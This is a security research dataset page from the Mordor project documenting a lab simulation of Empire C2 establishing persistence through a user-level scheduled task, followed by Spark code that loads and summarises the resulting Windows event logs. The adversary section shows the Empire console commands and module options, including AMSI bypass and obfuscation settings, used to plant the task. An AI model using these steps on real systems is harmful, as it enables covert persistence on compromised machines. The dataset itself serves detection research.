Empire Userland Scheduled Tasks

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/20

Tactics

[‘TA0003’]

Techniques

[‘T1053.005’]

Tags

[‘Local Scheduled Tasks’]

Dataset Description

This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

schtasks

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

3MWPS8L6 ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         7312   5/0.0    2020-09-21 07:12:36  http            

(Empire: agents) > interact 3MWPS8L6         
(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/userland/schtasks
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks. This has a
  moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        3MWPS8L6                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False       09:00                     Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  TaskName         True        Updater                   Name to use for the schtask.            
  RegPath          False       HKCU:\Software\Microsoft  Registry location to store the script   
                              \Windows\CurrentVersion\  code. Last element is the key name.     
                              debug                   
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/userland/schtasks) > set Listener http
(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask
(Empire: powershell/persistence/userland/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT
[*] Agent 3MWPS8L6 tasked with task ID 1
[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > 
SUCCESS: The scheduled task "MordorSchtask" has successfully been created.
Schtasks persistence established using listener http stored in HKCU:\Software\Microsoft\Windows\CurrentVersion\debug with MordorSchtask daily trigger at 09:00.

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_schtasks_creation_standard_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |515  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |199  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |172  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |69   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |38   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
|MORDORDC.theshire.local    |Security                                |5158   |27   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |22   |
|MORDORDC.theshire.local    |Security                                |4658   |21   |
|WORKSTATION5.theshire.local|Security                                |5158   |18   |
|WORKSTATION6.theshire.local|security                                |5158   |18   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |17   |
|WORKSTATION6.theshire.local|security                                |5156   |16   |
|WORKSTATION5.theshire.local|Security                                |5156   |13   |
|MORDORDC.theshire.local    |Security                                |4663   |10   |
|MORDORDC.theshire.local    |Security                                |4656   |10   |
|MORDORDC.theshire.local    |Security                                |4690   |10   |
|MORDORDC.theshire.local    |Security                                |4672   |8    |
|MORDORDC.theshire.local    |Security                                |4627   |8    |
|MORDORDC.theshire.local    |Security                                |4624   |8    |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows